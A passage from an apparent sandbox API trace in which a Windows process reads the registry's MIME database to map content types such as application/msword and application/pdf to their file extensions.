| out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.325] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.325] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".hqx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.326] CharLowerBuffW (in: lpsz=".hqx", cchLength=0x4 | out: lpsz=".hqx") returned 0x4 [0104.326] CharLowerBuffW (in: lpsz="application/mac-binhex40", cchLength=0x18 | out: lpsz="application/mac-binhex40") returned 0x18 [0104.326] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.326] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.327] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.327] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accdb", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.327] CharLowerBuffW (in: lpsz=".accdb", cchLength=0x6 | out: lpsz=".accdb") returned 0x6 [0104.327] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0104.327] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.327] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.addin", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.328] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.329] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accda", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.329] CharLowerBuffW (in: lpsz=".accda", cchLength=0x6 | out: lpsz=".accda") returned 0x6 [0104.329] CharLowerBuffW (in: lpsz="application/msaccess.addin", cchLength=0x1a | out: lpsz="application/msaccess.addin") returned 0x1a [0104.329] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.329] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.cab", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.330] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.330] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accdc", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.330] CharLowerBuffW (in: lpsz=".accdc", cchLength=0x6 | out: lpsz=".accdc") returned 0x6 [0104.330] CharLowerBuffW (in: lpsz="application/msaccess.cab", cchLength=0x18 | out: lpsz="application/msaccess.cab") returned 0x18 [0104.331] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.331] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.exec", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.332] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.332] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accde", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.332] CharLowerBuffW (in: lpsz=".accde", cchLength=0x6 | out: lpsz=".accde") returned 0x6 [0104.332] CharLowerBuffW (in: lpsz="application/msaccess.exec", cchLength=0x19 | out: lpsz="application/msaccess.exec") returned 0x19 [0104.332] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.332] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.ftemplate", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.333] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.334] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accft", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.334] CharLowerBuffW (in: lpsz=".accft", cchLength=0x6 | out: lpsz=".accft") returned 0x6 [0104.334] CharLowerBuffW (in: lpsz="application/msaccess.ftemplate", cchLength=0x1e | out: lpsz="application/msaccess.ftemplate") returned 0x1e [0104.334] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.334] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.397] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.398] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accdr", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.399] CharLowerBuffW (in: lpsz=".accdr", cchLength=0x6 | out: lpsz=".accdr") returned 0x6 [0104.399] CharLowerBuffW (in: lpsz="application/msaccess.runtime", cchLength=0x1c | out: lpsz="application/msaccess.runtime") returned 0x1c [0104.399] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.399] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.template", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.400] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.402] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accdt", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.402] CharLowerBuffW (in: lpsz=".accdt", cchLength=0x6 | out: lpsz=".accdt") returned 0x6 [0104.402] CharLowerBuffW (in: lpsz="application/msaccess.template", cchLength=0x1d | out: lpsz="application/msaccess.template") returned 0x1d [0104.402] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.402] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msaccess.webapplication", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.403] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xe) returned 0x0 [0104.403] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xe | out: lpType=0x19fc10*=0x1, lpData=".accdw", lpcbData=0x19fc20*=0xe) returned 0x0 [0104.404] CharLowerBuffW (in: lpsz=".accdw", cchLength=0x6 | out: lpsz=".accdw") returned 0x6 [0104.404] CharLowerBuffW (in: lpsz="application/msaccess.webapplication", cchLength=0x23 | out: lpsz="application/msaccess.webapplication") returned 0x23 [0104.404] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.404] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msonenote", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.405] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.405] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".one", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.405] CharLowerBuffW (in: lpsz=".one", cchLength=0x4 | out: lpsz=".one") returned 0x4 [0104.405] CharLowerBuffW (in: lpsz="application/msonenote", cchLength=0x15 | out: lpsz="application/msonenote") returned 0x15 [0104.405] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.405] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/msword", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.406] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.406] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".doc", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.407] CharLowerBuffW (in: lpsz=".doc", cchLength=0x4 | out: lpsz=".doc") returned 0x4 [0104.407] CharLowerBuffW (in: lpsz="application/msword", cchLength=0x12 | out: lpsz="application/msword") returned 0x12 [0104.407] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.408] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/opensearchdescription+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.408] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.409] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".osdx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.410] CharLowerBuffW (in: lpsz=".osdx", cchLength=0x5 | out: lpsz=".osdx") returned 0x5 [0104.410] CharLowerBuffW (in: lpsz="application/opensearchdescription+xml", cchLength=0x25 | out: lpsz="application/opensearchdescription+xml") returned 0x25 [0104.410] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.410] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pdf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.410] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.411] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".pdf", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.412] CharLowerBuffW (in: lpsz=".pdf", cchLength=0x4 | out: lpsz=".pdf") returned 0x4 [0104.412] CharLowerBuffW (in: lpsz="application/pdf", cchLength=0xf | out: lpsz="application/pdf") returned 0xf [0104.412] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.412] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pkcs10", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.412] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.413] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p10", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.413] CharLowerBuffW (in: lpsz=".p10", cchLength=0x4 | out: lpsz=".p10") returned 0x4 [0104.413] CharLowerBuffW (in: lpsz="application/pkcs10", cchLength=0x12 | out: lpsz="application/pkcs10") returned 0x12 [0104.413] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.413] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pkcs7-mime", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.414] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.414] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p7c", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.415] CharLowerBuffW (in: lpsz=".p7c", cchLength=0x4 | out: lpsz=".p7c") returned 0x4 [0104.415] CharLowerBuffW (in: lpsz="application/pkcs7-mime", cchLength=0x16 | out: lpsz="application/pkcs7-mime") returned 0x16 [0104.415] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.415] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pkcs7-signature", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.416] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.416] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".p7s", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.416] CharLowerBuffW (in: lpsz=".p7s", cchLength=0x4 | out: lpsz=".p7s") returned 0x4 [0104.416] CharLowerBuffW (in: lpsz="application/pkcs7-signature", cchLength=0x1b | out: lpsz="application/pkcs7-signature") returned 0x1b [0104.417] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.417] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pkix-cert", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.418] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.418] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".cer", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.420] CharLowerBuffW (in: lpsz=".cer", cchLength=0x4 | out: lpsz=".cer") returned 0x4 [0104.420] CharLowerBuffW (in: lpsz="application/pkix-cert", cchLength=0x15 | out: lpsz="application/pkix-cert") returned 0x15 [0104.420] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.420] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/pkix-crl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.421] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.421] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".crl", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.421] CharLowerBuffW (in: lpsz=".crl", cchLength=0x4 | out: lpsz=".crl") returned 0x4 [0104.421] CharLowerBuffW (in: lpsz="application/pkix-crl", cchLength=0x14 | out: lpsz="application/pkix-crl") returned 0x14 [0104.421] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.421] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/postscript", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.422] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x8) returned 0x0 [0104.422] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0x8 | out: lpType=0x19fc10*=0x1, lpData=".ps", lpcbData=0x19fc20*=0x8) returned 0x0 [0104.423] CharLowerBuffW (in: lpsz=".ps", cchLength=0x3 | out: lpsz=".ps") returned 0x3 [0104.423] CharLowerBuffW (in: lpsz="application/postscript", cchLength=0x16 | out: lpsz="application/postscript") returned 0x16 [0104.423] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.423] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/rss+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.424] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0104.424] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.424] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.acrobat-security-settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.424] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x32) returned 0x0 [0104.426] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f881c, lpcbData=0x19fc20*=0x32 | out: lpType=0x19fc10*=0x1, lpData=".acrobatsecuritysettings", lpcbData=0x19fc20*=0x32) returned 0x0 [0104.426] CharLowerBuffW (in: lpsz=".acrobatsecuritysettings", cchLength=0x18 | out: lpsz=".acrobatsecuritysettings") returned 0x18 [0104.426] CharLowerBuffW (in: lpsz="application/vnd.adobe.acrobat-security-settings", cchLength=0x2f | out: lpsz="application/vnd.adobe.acrobat-security-settings") returned 0x2f [0104.426] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.426] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.pdfxml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.427] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x10) returned 0x0 [0104.428] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x249a6ac, lpcbData=0x19fc20*=0x10 | out: lpType=0x19fc10*=0x1, lpData=".pdfxml", lpcbData=0x19fc20*=0x10) returned 0x0 [0104.428] CharLowerBuffW (in: lpsz=".pdfxml", cchLength=0x7 | out: lpsz=".pdfxml") returned 0x7 [0104.428] CharLowerBuffW (in: lpsz="application/vnd.adobe.pdfxml", cchLength=0x1c | out: lpsz="application/vnd.adobe.pdfxml") returned 0x1c [0104.429] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.429] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.pdx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.430] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.430] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".pdx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.431] CharLowerBuffW (in: lpsz=".pdx", cchLength=0x4 | out: lpsz=".pdx") returned 0x4 [0104.431] CharLowerBuffW (in: lpsz="application/vnd.adobe.pdx", cchLength=0x19 | out: lpsz="application/vnd.adobe.pdx") returned 0x19 [0104.431] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.431] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.xdp+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.432] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.432] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xdp", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.432] CharLowerBuffW (in: lpsz=".xdp", cchLength=0x4 | out: lpsz=".xdp") returned 0x4 [0104.432] CharLowerBuffW (in: lpsz="application/vnd.adobe.xdp+xml", cchLength=0x1d | out: lpsz="application/vnd.adobe.xdp+xml") returned 0x1d [0104.432] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.433] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.xfd+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.433] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.434] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xfd", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.435] CharLowerBuffW (in: lpsz=".xfd", cchLength=0x4 | out: lpsz=".xfd") returned 0x4 [0104.435] CharLowerBuffW (in: lpsz="application/vnd.adobe.xfd+xml", cchLength=0x1d | out: lpsz="application/vnd.adobe.xfd+xml") returned 0x1d [0104.435] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.435] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.adobe.xfdf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.436] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.436] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xfdf", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.437] CharLowerBuffW (in: lpsz=".xfdf", cchLength=0x5 | out: lpsz=".xfdf") returned 0x5 [0104.437] CharLowerBuffW (in: lpsz="application/vnd.adobe.xfdf", cchLength=0x1a | out: lpsz="application/vnd.adobe.xfdf") returned 0x1a [0104.437] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.437] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.fdf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.438] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.439] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".fdf", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.439] CharLowerBuffW (in: lpsz=".fdf", cchLength=0x4 | out: lpsz=".fdf") returned 0x4 [0104.439] CharLowerBuffW (in: lpsz="application/vnd.fdf", cchLength=0x13 | out: lpsz="application/vnd.fdf") returned 0x13 [0104.439] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.439] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.440] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, 